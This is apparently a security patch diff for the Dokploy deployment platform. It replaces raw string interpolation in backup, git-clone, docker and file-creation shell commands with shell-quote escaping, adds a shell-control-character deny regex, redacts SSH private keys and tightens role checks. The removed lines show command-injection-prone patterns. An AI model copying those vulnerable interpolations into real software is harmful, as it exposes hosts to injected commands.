ctx: { user: { id: string }; session: { activeOrganizationId: string } },
|
||||||
|
scheduleType: Schedule["scheduleType"] | null | undefined,
|
||||||
|
serverId: string | null | undefined,
|
||||||
|
) => {
|
||||||
|
if (scheduleType !== "server" && scheduleType !== "dokploy-server") return;
|
||||||
|
|
||||||
|
if (scheduleType === "dokploy-server" && IS_CLOUD) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "FORBIDDEN",
|
||||||
|
message: "Host-level schedules are not available in the cloud version.",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
const member = await findMemberByUserId(
|
||||||
|
ctx.user.id,
|
||||||
|
ctx.session.activeOrganizationId,
|
||||||
|
);
|
||||||
|
if (member.role !== "owner" && member.role !== "admin") {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "FORBIDDEN",
|
||||||
|
message: "Only owners and admins can manage server-level schedules.",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
if (scheduleType === "server" && serverId) {
|
||||||
|
const targetServer = await findServerById(serverId);
|
||||||
|
if (targetServer.organizationId !== ctx.session.activeOrganizationId) {
|
||||||
|
throw new TRPCError({
|
||||||
|
code: "UNAUTHORIZED",
|
||||||
|
message: "You don't have access to this server.",
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
export const createSchedule = async (
|
export const createSchedule = async (
|
||||||
input: z.infer<typeof createScheduleSchema>,
|
input: z.infer<typeof createScheduleSchema>,
|
||||||
) => {
|
) => {
|
||||||
|
|||||||
@@ -53,6 +53,27 @@ export const findServerById = async (serverId: string) => {
|
|||||||
return currentServer;
|
return currentServer;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Removes the SSH private key material from a server record before it is sent
|
||||||
|
* to a client. `findServerById` eagerly loads the `sshKey` relation (needed for
|
||||||
|
* server-side SSH operations), but the private key must never leave the server:
|
||||||
|
* no client feature consumes it, and returning it exposed it to any member with
|
||||||
|
* only `server:read`. Server-side callers keep using `findServerById` directly.
|
||||||
|
*/
|
||||||
|
export const redactServerSshKey = <
|
||||||
|
T extends { sshKey?: { privateKey: string } | null },
|
||||||
|
>(
|
||||||
|
serverRecord: T,
|
||||||
|
): T => {
|
||||||
|
if (!serverRecord.sshKey) {
|
||||||
|
return serverRecord;
|
||||||
|
}
|
||||||
|
return {
|
||||||
|
...serverRecord,
|
||||||
|
sshKey: { ...serverRecord.sshKey, privateKey: "" },
|
||||||
|
};
|
||||||
|
};
|
||||||
|
|
||||||
export const findServersByUserId = async (userId: string) => {
|
export const findServersByUserId = async (userId: string) => {
|
||||||
const orgs = await db.query.organization.findMany({
|
const orgs = await db.query.organization.findMany({
|
||||||
where: eq(organization.ownerId, userId),
|
where: eq(organization.ownerId, userId),
|
||||||
|
|||||||
@@ -430,7 +430,7 @@ export const createOrganizationUserWithCredentials = async ({
|
|||||||
.insert(user)
|
.insert(user)
|
||||||
.values({
|
.values({
|
||||||
email: normalizedEmail,
|
email: normalizedEmail,
|
||||||
emailVerified: false,
|
emailVerified: true,
|
||||||
updatedAt: now,
|
updatedAt: now,
|
||||||
})
|
})
|
||||||
.returning({
|
.returning({
|
||||||
|
|||||||
@@ -2,6 +2,7 @@ import { logger } from "@dokploy/server/lib/logger";
|
|||||||
import type { BackupSchedule } from "@dokploy/server/services/backup";
|
import type { BackupSchedule } from "@dokploy/server/services/backup";
|
||||||
import type { Destination } from "@dokploy/server/services/destination";
|
import type { Destination } from "@dokploy/server/services/destination";
|
||||||
import { scheduledJobs, scheduleJob } from "node-schedule";
|
import { scheduledJobs, scheduleJob } from "node-schedule";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { keepLatestNBackups } from ".";
|
import { keepLatestNBackups } from ".";
|
||||||
import { runComposeBackup } from "./compose";
|
import { runComposeBackup } from "./compose";
|
||||||
import { runLibsqlBackup } from "./libsql";
|
import { runLibsqlBackup } from "./libsql";
|
||||||
@@ -71,16 +72,16 @@ export const getS3Credentials = (destination: Destination) => {
|
|||||||
const { accessKey, secretAccessKey, region, endpoint, provider } =
|
const { accessKey, secretAccessKey, region, endpoint, provider } =
|
||||||
destination;
|
destination;
|
||||||
const rcloneFlags = [
|
const rcloneFlags = [
|
||||||
`--s3-access-key-id="${accessKey}"`,
|
`--s3-access-key-id=${quote([accessKey])}`,
|
||||||
`--s3-secret-access-key="${secretAccessKey}"`,
|
`--s3-secret-access-key=${quote([secretAccessKey])}`,
|
||||||
`--s3-region="${region}"`,
|
`--s3-region=${quote([region])}`,
|
||||||
`--s3-endpoint="${endpoint}"`,
|
`--s3-endpoint=${quote([endpoint])}`,
|
||||||
"--s3-no-check-bucket",
|
"--s3-no-check-bucket",
|
||||||
"--s3-force-path-style",
|
"--s3-force-path-style",
|
||||||
];
|
];
|
||||||
|
|
||||||
if (provider) {
|
if (provider) {
|
||||||
rcloneFlags.unshift(`--s3-provider="${provider}"`);
|
rcloneFlags.unshift(`--s3-provider=${quote([provider])}`);
|
||||||
}
|
}
|
||||||
|
|
||||||
if (destination.additionalFlags?.length) {
|
if (destination.additionalFlags?.length) {
|
||||||
@@ -90,11 +91,16 @@ export const getS3Credentials = (destination: Destination) => {
|
|||||||
return rcloneFlags;
|
return rcloneFlags;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
// User-controlled values (database name, user, password) are passed to the
|
||||||
|
// container as environment variables via `docker exec -e VAR=<escaped>` and
|
||||||
|
// referenced as "$VAR" inside the inner shell, so they never appear in the
|
||||||
|
// inner command text. The -e value is escaped for the outer shell with
|
||||||
|
// shell-quote; the inner script is single-quoted and reads the env vars.
|
||||||
export const getPostgresBackupCommand = (
|
export const getPostgresBackupCommand = (
|
||||||
database: string,
|
database: string,
|
||||||
databaseUser: string,
|
databaseUser: string,
|
||||||
) => {
|
) => {
|
||||||
return `docker exec -i $CONTAINER_ID bash -c "set -o pipefail; pg_dump -Fc --no-acl --no-owner -h localhost -U ${databaseUser} --no-password '${database}' | gzip"`;
|
return `docker exec -e DB_NAME=${quote([database])} -e DB_USER=${quote([databaseUser])} -i $CONTAINER_ID bash -c 'set -o pipefail; pg_dump -Fc --no-acl --no-owner -h localhost -U "$DB_USER" --no-password "$DB_NAME" | gzip'`;
|
||||||
};
|
};
|
||||||
|
|
||||||
export const getMariadbBackupCommand = (
|
export const getMariadbBackupCommand = (
|
||||||
@@ -102,14 +108,14 @@ export const getMariadbBackupCommand = (
|
|||||||
databaseUser: string,
|
databaseUser: string,
|
||||||
databasePassword: string,
|
databasePassword: string,
|
||||||
) => {
|
) => {
|
||||||
return `docker exec -i $CONTAINER_ID bash -c "set -o pipefail; mariadb-dump --user='${databaseUser}' --password='${databasePassword}' --single-transaction --quick --databases ${database} | gzip"`;
|
return `docker exec -e DB_NAME=${quote([database])} -e DB_USER=${quote([databaseUser])} -e DB_PASS=${quote([databasePassword])} -i $CONTAINER_ID bash -c 'set -o pipefail; mariadb-dump --user="$DB_USER" --password="$DB_PASS" --single-transaction --quick --databases "$DB_NAME" | gzip'`;
|
||||||
};
|
};
|
||||||
|
|
||||||
export const getMysqlBackupCommand = (
|
export const getMysqlBackupCommand = (
|
||||||
database: string,
|
database: string,
|
||||||
databasePassword: string,
|
databasePassword: string,
|
||||||
) => {
|
) => {
|
||||||
return `docker exec -i $CONTAINER_ID bash -c "set -o pipefail; mysqldump --default-character-set=utf8mb4 -u 'root' --password='${databasePassword}' --single-transaction --no-tablespaces --quick '${database}' | gzip"`;
|
return `docker exec -e DB_NAME=${quote([database])} -e DB_PASS=${quote([databasePassword])} -i $CONTAINER_ID bash -c 'set -o pipefail; mysqldump --default-character-set=utf8mb4 -u root --password="$DB_PASS" --single-transaction --no-tablespaces --quick "$DB_NAME" | gzip'`;
|
||||||
};
|
};
|
||||||
|
|
||||||
export const getMongoBackupCommand = (
|
export const getMongoBackupCommand = (
|
||||||
@@ -117,11 +123,11 @@ export const getMongoBackupCommand = (
|
|||||||
databaseUser: string,
|
databaseUser: string,
|
||||||
databasePassword: string,
|
databasePassword: string,
|
||||||
) => {
|
) => {
|
||||||
return `docker exec -i $CONTAINER_ID bash -c "set -o pipefail; mongodump -d '${database}' -u '${databaseUser}' -p '${databasePassword}' --archive --authenticationDatabase admin --gzip"`;
|
return `docker exec -e DB_NAME=${quote([database])} -e DB_USER=${quote([databaseUser])} -e DB_PASS=${quote([databasePassword])} -i $CONTAINER_ID bash -c 'set -o pipefail; mongodump -d "$DB_NAME" -u "$DB_USER" -p "$DB_PASS" --archive --authenticationDatabase admin --gzip'`;
|
||||||
};
|
};
|
||||||
|
|
||||||
export const getLibsqlBackupCommand = (database: string) => {
|
export const getLibsqlBackupCommand = (database: string) => {
|
||||||
return `docker exec -i $CONTAINER_ID sh -c "tar cf - -C /var/lib/sqld ${database} | gzip"`;
|
return `docker exec -e DB_NAME=${quote([database])} -i $CONTAINER_ID sh -c 'tar cf - -C /var/lib/sqld "$DB_NAME" | gzip'`;
|
||||||
};
|
};
|
||||||
|
|
||||||
export const getServiceContainerCommand = (appName: string) => {
|
export const getServiceContainerCommand = (appName: string) => {
|
||||||
|
|||||||
@@ -67,9 +67,20 @@ Compose Type: ${composeType} ✅`;
|
|||||||
return bashCommand;
|
return bashCommand;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
// Shell control characters that must never appear in a user-provided compose
|
||||||
|
// command: they would let it break out of the `docker ${command}` invocation
|
||||||
|
// into arbitrary host commands. A normal docker compose CLI line never needs them.
|
||||||
|
const UNSAFE_COMPOSE_COMMAND = /[;&|`$(){}<>\n\\]/;
|
||||||
|
|
||||||
const sanitizeCommand = (command: string) => {
|
const sanitizeCommand = (command: string) => {
|
||||||
const sanitizedCommand = command.trim();
|
const sanitizedCommand = command.trim();
|
||||||
|
|
||||||
|
if (UNSAFE_COMPOSE_COMMAND.test(sanitizedCommand)) {
|
||||||
|
throw new Error(
|
||||||
|
"Invalid characters in compose command: shell control characters are not allowed",
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
const parts = sanitizedCommand.split(/\s+/);
|
const parts = sanitizedCommand.split(/\s+/);
|
||||||
|
|
||||||
const restCommand = parts.map((arg) => arg.replace(/^"(.*)"$/, "$1"));
|
const restCommand = parts.map((arg) => arg.replace(/^"(.*)"$/, "$1"));
|
||||||
@@ -88,9 +99,9 @@ export const createCommand = (compose: ComposeNested) => {
|
|||||||
let command = "";
|
let command = "";
|
||||||
|
|
||||||
if (composeType === "docker-compose") {
|
if (composeType === "docker-compose") {
|
||||||
command = `compose -p ${appName} -f ${path} up -d --build --remove-orphans`;
|
command = `compose -p ${quote([appName])} -f ${quote([path])} up -d --build --remove-orphans`;
|
||||||
} else if (composeType === "stack") {
|
} else if (composeType === "stack") {
|
||||||
command = `stack deploy -c ${path} ${appName} --prune --with-registry-auth`;
|
command = `stack deploy -c ${quote([path])} ${quote([appName])} --prune --with-registry-auth`;
|
||||||
}
|
}
|
||||||
|
|
||||||
return command;
|
return command;
|
||||||
@@ -124,8 +135,8 @@ export const getCreateEnvFileCommand = (compose: ComposeNested) => {
|
|||||||
|
|
||||||
const encodedContent = encodeBase64(envFileContent);
|
const encodedContent = encodeBase64(envFileContent);
|
||||||
return `
|
return `
|
||||||
touch ${envFilePath};
|
touch ${quote([envFilePath])};
|
||||||
echo "${encodedContent}" | base64 -d > "${envFilePath}";
|
echo "${encodedContent}" | base64 -d > ${quote([envFilePath])};
|
||||||
`;
|
`;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|||||||
@@ -85,9 +85,9 @@ export const getDockerCommand = (application: ApplicationNested) => {
|
|||||||
}
|
}
|
||||||
|
|
||||||
command += `
|
command += `
|
||||||
echo "Building ${appName}" ;
|
echo ${quote([`Building ${appName}`])} ;
|
||||||
cd ${dockerContextPath} || {
|
cd ${quote([dockerContextPath])} || {
|
||||||
echo "❌ The path ${dockerContextPath} does not exist" ;
|
echo ${quote([`❌ The path ${dockerContextPath} does not exist`])} ;
|
||||||
exit 1;
|
exit 1;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -1,6 +1,7 @@
|
|||||||
import path from "node:path";
|
import path from "node:path";
|
||||||
import { getStaticCommand } from "@dokploy/server/utils/builders/static";
|
import { getStaticCommand } from "@dokploy/server/utils/builders/static";
|
||||||
import { nanoid } from "nanoid";
|
import { nanoid } from "nanoid";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { prepareEnvironmentVariablesForShell } from "../docker/utils";
|
import { prepareEnvironmentVariablesForShell } from "../docker/utils";
|
||||||
import { getBuildAppDirectory } from "../filesystem/directory";
|
import { getBuildAppDirectory } from "../filesystem/directory";
|
||||||
import type { ApplicationNested } from ".";
|
import type { ApplicationNested } from ".";
|
||||||
@@ -52,10 +53,10 @@ export const getNixpacksCommand = (application: ApplicationNested) => {
|
|||||||
|
|
||||||
bashCommand += `
|
bashCommand += `
|
||||||
docker create --name ${buildContainerId} ${appName}
|
docker create --name ${buildContainerId} ${appName}
|
||||||
mkdir -p ${localPath}
|
mkdir -p ${quote([localPath])}
|
||||||
docker cp ${buildContainerId}:/app/${publishDirectory}${isDirectory ? "/." : ""} ${path.join(buildAppDirectory, publishDirectory)} || {
|
docker cp ${quote([`${buildContainerId}:/app/${publishDirectory}${isDirectory ? "/." : ""}`])} ${quote([localPath])} || {
|
||||||
docker rm ${buildContainerId}
|
docker rm ${buildContainerId}
|
||||||
echo "❌ Copying ${publishDirectory} to ${path.join(buildAppDirectory, publishDirectory)} failed" ;
|
echo ${quote([`❌ Copying ${publishDirectory} to ${localPath} failed`])} ;
|
||||||
exit 1;
|
exit 1;
|
||||||
}
|
}
|
||||||
docker rm ${buildContainerId}
|
docker rm ${buildContainerId}
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ import {
|
|||||||
safeDockerLoginCommand,
|
safeDockerLoginCommand,
|
||||||
} from "@dokploy/server/services/registry";
|
} from "@dokploy/server/services/registry";
|
||||||
import { createRollback } from "@dokploy/server/services/rollbacks";
|
import { createRollback } from "@dokploy/server/services/rollbacks";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { ApplicationNested } from "../builders";
|
import type { ApplicationNested } from "../builders";
|
||||||
|
|
||||||
export const uploadImageRemoteCommand = async (
|
export const uploadImageRemoteCommand = async (
|
||||||
@@ -124,18 +125,18 @@ const getRegistryCommands = (
|
|||||||
registry.password,
|
registry.password,
|
||||||
);
|
);
|
||||||
return `
|
return `
|
||||||
echo "📦 [Enabled Registry] Uploading image to '${registry.registryType}' | '${registryTag}'" ;
|
echo ${quote([`📦 [Enabled Registry] Uploading image to '${registry.registryType}' | '${registryTag}'`])} ;
|
||||||
${loginCmd} || {
|
${loginCmd} || {
|
||||||
echo "❌ DockerHub Failed" ;
|
echo "❌ DockerHub Failed" ;
|
||||||
exit 1;
|
exit 1;
|
||||||
}
|
}
|
||||||
echo "✅ Registry Login Success" ;
|
echo "✅ Registry Login Success" ;
|
||||||
docker tag ${imageName} ${registryTag} || {
|
docker tag ${quote([imageName])} ${quote([registryTag])} || {
|
||||||
echo "❌ Error tagging image" ;
|
echo "❌ Error tagging image" ;
|
||||||
exit 1;
|
exit 1;
|
||||||
}
|
}
|
||||||
echo "✅ Image Tagged" ;
|
echo "✅ Image Tagged" ;
|
||||||
docker push ${registryTag} || {
|
docker push ${quote([registryTag])} || {
|
||||||
echo "❌ Error pushing image" ;
|
echo "❌ Error pushing image" ;
|
||||||
exit 1;
|
exit 1;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -14,6 +14,7 @@ import { deployMySql } from "@dokploy/server/services/mysql";
|
|||||||
import { deployPostgres } from "@dokploy/server/services/postgres";
|
import { deployPostgres } from "@dokploy/server/services/postgres";
|
||||||
import { deployRedis } from "@dokploy/server/services/redis";
|
import { deployRedis } from "@dokploy/server/services/redis";
|
||||||
import { eq } from "drizzle-orm";
|
import { eq } from "drizzle-orm";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { removeService } from "../docker/utils";
|
import { removeService } from "../docker/utils";
|
||||||
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
||||||
|
|
||||||
@@ -40,7 +41,7 @@ export const rebuildDatabase = async (
|
|||||||
|
|
||||||
for (const mount of database.mounts) {
|
for (const mount of database.mounts) {
|
||||||
if (mount.type === "volume") {
|
if (mount.type === "volume") {
|
||||||
const command = `docker volume rm ${mount?.volumeName} --force`;
|
const command = `docker volume rm ${quote([mount?.volumeName ?? ""])} --force`;
|
||||||
if (database.serverId) {
|
if (database.serverId) {
|
||||||
await execAsyncRemote(database.serverId, command);
|
await execAsyncRemote(database.serverId, command);
|
||||||
} else {
|
} else {
|
||||||
|
|||||||
@@ -712,14 +712,14 @@ export const getCreateFileCommand = (
|
|||||||
) => {
|
) => {
|
||||||
const fullPath = path.join(outputPath, filePath);
|
const fullPath = path.join(outputPath, filePath);
|
||||||
if (fullPath.endsWith(path.sep) || filePath.endsWith("/")) {
|
if (fullPath.endsWith(path.sep) || filePath.endsWith("/")) {
|
||||||
return `mkdir -p ${fullPath};`;
|
return `mkdir -p ${quote([fullPath])};`;
|
||||||
}
|
}
|
||||||
|
|
||||||
const directory = path.dirname(fullPath);
|
const directory = path.dirname(fullPath);
|
||||||
const encodedContent = encodeBase64(content);
|
const encodedContent = encodeBase64(content);
|
||||||
return `
|
return `
|
||||||
mkdir -p ${directory};
|
mkdir -p ${quote([directory])};
|
||||||
echo "${encodedContent}" | base64 -d > "${fullPath}";
|
echo "${encodedContent}" | base64 -d > ${quote([fullPath])};
|
||||||
`;
|
`;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|||||||
@@ -1,4 +1,5 @@
|
|||||||
import * as fs from "node:fs/promises";
|
import * as fs from "node:fs/promises";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { execAsync, execAsyncRemote, sleep } from "../utils/process/execAsync";
|
import { execAsync, execAsyncRemote, sleep } from "../utils/process/execAsync";
|
||||||
|
|
||||||
interface GPUInfo {
|
interface GPUInfo {
|
||||||
@@ -322,7 +323,7 @@ const setupLocalServer = async (daemonConfig: any) => {
|
|||||||
};
|
};
|
||||||
|
|
||||||
const addGpuLabel = async (nodeId: string, serverId?: string) => {
|
const addGpuLabel = async (nodeId: string, serverId?: string) => {
|
||||||
const labelCommand = `docker node update --label-add gpu=true ${nodeId}`;
|
const labelCommand = `docker node update --label-add gpu=true ${quote([nodeId])}`;
|
||||||
if (serverId) {
|
if (serverId) {
|
||||||
await execAsyncRemote(serverId, labelCommand);
|
await execAsyncRemote(serverId, labelCommand);
|
||||||
} else {
|
} else {
|
||||||
@@ -335,7 +336,7 @@ const verifySetup = async (nodeId: string, serverId?: string) => {
|
|||||||
|
|
||||||
if (!finalStatus.swarmEnabled) {
|
if (!finalStatus.swarmEnabled) {
|
||||||
const diagnosticCommands = [
|
const diagnosticCommands = [
|
||||||
`docker node inspect ${nodeId}`,
|
`docker node inspect ${quote([nodeId])}`,
|
||||||
'nvidia-smi -a | grep "GPU UUID"',
|
'nvidia-smi -a | grep "GPU UUID"',
|
||||||
"cat /etc/docker/daemon.json",
|
"cat /etc/docker/daemon.json",
|
||||||
"cat /etc/nvidia-container-runtime/config.toml",
|
"cat /etc/nvidia-container-runtime/config.toml",
|
||||||
|
|||||||
@@ -10,8 +10,8 @@ import {
|
|||||||
} from "@dokploy/server/services/bitbucket";
|
} from "@dokploy/server/services/bitbucket";
|
||||||
import type { InferResultType } from "@dokploy/server/types/with";
|
import type { InferResultType } from "@dokploy/server/types/with";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { shellWord } from "./utils";
|
|
||||||
|
|
||||||
export type ApplicationWithBitbucket = InferResultType<
|
export type ApplicationWithBitbucket = InferResultType<
|
||||||
"applications",
|
"applications",
|
||||||
@@ -125,8 +125,8 @@ export const cloneBitbucketRepository = async ({
|
|||||||
const repoToUse = entity.bitbucketRepositorySlug || bitbucketRepository;
|
const repoToUse = entity.bitbucketRepositorySlug || bitbucketRepository;
|
||||||
const repoclone = `bitbucket.org/${bitbucketOwner}/${repoToUse}.git`;
|
const repoclone = `bitbucket.org/${bitbucketOwner}/${repoToUse}.git`;
|
||||||
const cloneUrl = getBitbucketCloneUrl(bitbucket, repoclone);
|
const cloneUrl = getBitbucketCloneUrl(bitbucket, repoclone);
|
||||||
command += `echo ${shellWord(`Cloning Repo ${repoclone} to ${outputPath}: ✅`)};`;
|
command += `echo ${quote([`Cloning Repo ${repoclone} to ${outputPath}: ✅`])};`;
|
||||||
command += `git clone --branch ${shellWord(bitbucketBranch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${shellWord(cloneUrl)} ${shellWord(outputPath)} --progress;`;
|
command += `git clone --branch ${quote([String(bitbucketBranch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${quote([String(cloneUrl ?? "")])} ${quote([String(outputPath ?? "")])} --progress;`;
|
||||||
return command;
|
return command;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|||||||
@@ -1,4 +1,5 @@
|
|||||||
import { safeDockerLoginCommand } from "@dokploy/server/services/registry";
|
import { safeDockerLoginCommand } from "@dokploy/server/services/registry";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { ApplicationNested } from "../builders";
|
import type { ApplicationNested } from "../builders";
|
||||||
|
|
||||||
export const buildRemoteDocker = async (application: ApplicationNested) => {
|
export const buildRemoteDocker = async (application: ApplicationNested) => {
|
||||||
@@ -9,7 +10,7 @@ export const buildRemoteDocker = async (application: ApplicationNested) => {
|
|||||||
throw new Error("Docker image not found");
|
throw new Error("Docker image not found");
|
||||||
}
|
}
|
||||||
let command = `
|
let command = `
|
||||||
echo "Pulling ${dockerImage}";
|
echo ${quote([`Pulling ${dockerImage}`])};
|
||||||
`;
|
`;
|
||||||
|
|
||||||
if (username && password) {
|
if (username && password) {
|
||||||
@@ -22,7 +23,7 @@ fi
|
|||||||
}
|
}
|
||||||
|
|
||||||
command += `
|
command += `
|
||||||
docker pull ${dockerImage} 2>&1 || {
|
docker pull ${quote([dockerImage])} 2>&1 || {
|
||||||
echo "❌ Pulling image failed";
|
echo "❌ Pulling image failed";
|
||||||
exit 1;
|
exit 1;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -4,8 +4,8 @@ import {
|
|||||||
findSSHKeyById,
|
findSSHKeyById,
|
||||||
updateSSHKeyById,
|
updateSSHKeyById,
|
||||||
} from "@dokploy/server/services/ssh-key";
|
} from "@dokploy/server/services/ssh-key";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
import { execAsync, execAsyncRemote } from "../process/execAsync";
|
||||||
import { shellWord } from "./utils";
|
|
||||||
|
|
||||||
interface CloneGitRepository {
|
interface CloneGitRepository {
|
||||||
appName: string;
|
appName: string;
|
||||||
@@ -62,7 +62,7 @@ export const cloneGitRepository = async ({
|
|||||||
}
|
}
|
||||||
command += `rm -rf ${outputPath};`;
|
command += `rm -rf ${outputPath};`;
|
||||||
command += `mkdir -p ${outputPath};`;
|
command += `mkdir -p ${outputPath};`;
|
||||||
command += `echo ${shellWord(`Cloning Repo Custom ${customGitUrl} to ${outputPath}: ✅`)};`;
|
command += `echo ${quote([`Cloning Repo Custom ${customGitUrl} to ${outputPath}: ✅`])};`;
|
||||||
|
|
||||||
if (customGitSSHKeyId) {
|
if (customGitSSHKeyId) {
|
||||||
await updateSSHKeyById({
|
await updateSSHKeyById({
|
||||||
@@ -79,8 +79,8 @@ export const cloneGitRepository = async ({
|
|||||||
command += "chmod 600 /tmp/id_rsa;";
|
command += "chmod 600 /tmp/id_rsa;";
|
||||||
command += `export GIT_SSH_COMMAND="${gitSshCommand}";`;
|
command += `export GIT_SSH_COMMAND="${gitSshCommand}";`;
|
||||||
}
|
}
|
||||||
command += `if ! git clone --branch ${shellWord(customGitBranch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} --progress ${shellWord(customGitUrl)} ${shellWord(outputPath)}; then
|
command += `if ! git clone --branch ${quote([String(customGitBranch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} --progress ${quote([String(customGitUrl ?? "")])} ${quote([String(outputPath ?? "")])}; then
|
||||||
echo ${shellWord(`❌ [ERROR] Fail to clone the repository ${customGitUrl}`)};
|
echo ${quote([`❌ [ERROR] Fail to clone the repository ${customGitUrl}`])};
|
||||||
exit 1;
|
exit 1;
|
||||||
fi
|
fi
|
||||||
`;
|
`;
|
||||||
@@ -115,7 +115,7 @@ const addHostToKnownHostsCommand = (repositoryURL: string) => {
|
|||||||
// ssh-keyscan is best-effort: some Git hosts (e.g. Hugging Face) never answer
|
// ssh-keyscan is best-effort: some Git hosts (e.g. Hugging Face) never answer
|
||||||
// it, and its exit code must not abort the clone under `set -e`. The clone's
|
// it, and its exit code must not abort the clone under `set -e`. The clone's
|
||||||
// own host-key check (StrictHostKeyChecking=accept-new) is the real boundary.
|
// own host-key check (StrictHostKeyChecking=accept-new) is the real boundary.
|
||||||
return `ssh-keyscan -p ${Number(port)} ${shellWord(domain)} >> ${knownHostsPath} || true;`;
|
return `ssh-keyscan -p ${Number(port)} ${quote([String(domain ?? "")])} >> ${knownHostsPath} || true;`;
|
||||||
};
|
};
|
||||||
const sanitizeRepoPathSSH = (input: string) => {
|
const sanitizeRepoPathSSH = (input: string) => {
|
||||||
const SSH_PATH_RE = new RegExp(
|
const SSH_PATH_RE = new RegExp(
|
||||||
|
|||||||
@@ -7,7 +7,7 @@ import {
|
|||||||
} from "@dokploy/server/services/gitea";
|
} from "@dokploy/server/services/gitea";
|
||||||
import type { InferResultType } from "@dokploy/server/types/with";
|
import type { InferResultType } from "@dokploy/server/types/with";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { shellWord } from "./utils";
|
import { quote } from "shell-quote";
|
||||||
|
|
||||||
export const getErrorCloneRequirements = (entity: {
|
export const getErrorCloneRequirements = (entity: {
|
||||||
giteaRepository?: string | null;
|
giteaRepository?: string | null;
|
||||||
@@ -177,8 +177,8 @@ export const cloneGiteaRepository = async ({
|
|||||||
giteaRepository!,
|
giteaRepository!,
|
||||||
);
|
);
|
||||||
|
|
||||||
command += `echo ${shellWord(`Cloning Repo ${repoClone} to ${outputPath}: ✅`)};`;
|
command += `echo ${quote([`Cloning Repo ${repoClone} to ${outputPath}: ✅`])};`;
|
||||||
command += `git clone --branch ${shellWord(giteaBranch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${shellWord(cloneUrl)} ${shellWord(outputPath)} --progress;`;
|
command += `git clone --branch ${quote([String(giteaBranch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${quote([String(cloneUrl ?? "")])} ${quote([String(outputPath ?? "")])} --progress;`;
|
||||||
return command;
|
return command;
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|||||||
@@ -6,8 +6,8 @@ import type { InferResultType } from "@dokploy/server/types/with";
|
|||||||
import { createAppAuth } from "@octokit/auth-app";
|
import { createAppAuth } from "@octokit/auth-app";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
import { Octokit } from "octokit";
|
import { Octokit } from "octokit";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { shellWord } from "./utils";
|
|
||||||
|
|
||||||
export const authGithub = (githubProvider: Github): Octokit => {
|
export const authGithub = (githubProvider: Github): Octokit => {
|
||||||
if (!haveGithubRequirements(githubProvider)) {
|
if (!haveGithubRequirements(githubProvider)) {
|
||||||
@@ -167,8 +167,8 @@ export const cloneGithubRepository = async ({
|
|||||||
command += `mkdir -p ${outputPath};`;
|
command += `mkdir -p ${outputPath};`;
|
||||||
const cloneUrl = `https://oauth2:${token}@${repoclone}`;
|
const cloneUrl = `https://oauth2:${token}@${repoclone}`;
|
||||||
|
|
||||||
command += `echo ${shellWord(`Cloning Repo ${repoclone} to ${outputPath}: ✅`)};`;
|
command += `echo ${quote([`Cloning Repo ${repoclone} to ${outputPath}: ✅`])};`;
|
||||||
command += `git clone --branch ${shellWord(branch)} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${shellWord(cloneUrl)} ${shellWord(outputPath)} --progress;`;
|
command += `git clone --branch ${quote([String(branch ?? "")])} --depth 1 ${enableSubmodules ? "--recurse-submodules" : ""} ${quote([String(cloneUrl ?? "")])} ${quote([String(outputPath ?? "")])} --progress;`;
|
||||||
|
|
||||||
return command;
|
return command;
|
||||||
};
|
};
|
||||||
|
|||||||
@@ -8,8 +8,8 @@ import {
|
|||||||
} from "@dokploy/server/services/gitlab";
|
} from "@dokploy/server/services/gitlab";
|
||||||
import type { InferResultType } from "@dokploy/server/types/with";
|
import type { InferResultType } from "@dokploy/server/types/with";
|
||||||
import { TRPCError } from "@trpc/server";
|
import { TRPCError } from "@trpc/server";
|
||||||
|
import { quote } from "shell-quote";
|
||||||
import type { z } from "zod";
|
import type { z } from "zod";
|
||||||
import { shellWord } from "./utils";
|
|
||||||
|
|
||||||
export const refreshGitlabToken = async (gitlabProviderId: string) => {
|
export const refreshGitlabToken = async (gitlabProviderId: string) => {
|
||||||
const gitlabProvider = await findGitlabById(gitlabProviderId);
|
const gitlabProvider = await findGitlabById(gitlabProviderId);
|
||||||
@@ -152,8 +152,8 @@ export const cloneGitlabRepository = async ({
|
|||||||
